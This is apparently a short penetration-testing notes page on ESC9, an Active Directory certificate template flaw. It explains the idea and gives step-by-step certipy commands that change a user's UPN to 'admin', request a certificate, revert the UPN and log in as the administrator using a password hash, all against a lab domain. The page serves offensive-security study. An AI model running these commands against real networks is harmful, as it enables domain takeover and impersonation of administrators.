ESC9
ABOUT
ESC9 allows a user with GenericWrite (or equivalent control) over another domain user to impersonate any user (e.g., Domain Admin) by abusing a vulnerable certificate template that does not enforce UPN/SAN validation. The attacker temporarily changes the controlled user's UPN to the victim's (e.g., administrator), requests a certificate, and then reverts the UPN. The issued certificate allows authentication as the victim.
FLOW
We need 2 users: User 1 who has GenericWrite, GenericAll, or WriteProperty over User2
Then we change the UPN of User2 to User3 (user who we want to impersonate, admin),
Requesting certificate for User2 and tricking CA because of absent validation.
Then we revert back the UPN.
And authenticate with certificate.
EXPLOITATION
Temporarily set user2’s UPN to admin
certipy account update -username "user1@militech.local" -hashes "aad3b435b51404eeaad3b435b51404ee" -user user2 -upn adminRequest certificate as user2 (with UPN = admin)
certipy req -username "user2@militech.local" -hashes "aad3b435b51404eeaad3b435b51404ee" -target ca.militech.local -ca militech-DC01-CA -template CertifiedAuthenticationRevert user2’s UPN back to original
certipy account update -username "user1@militech.local" -hashes "aad3b435b51404eeaad3b435b51404ee" -user user2 -upn "user2@militech.local"Authenticate with the certificate as admin
certipy auth -pfx admin.pfx -domain militech.local -target 13.13.13.13RESOURCES
Last updated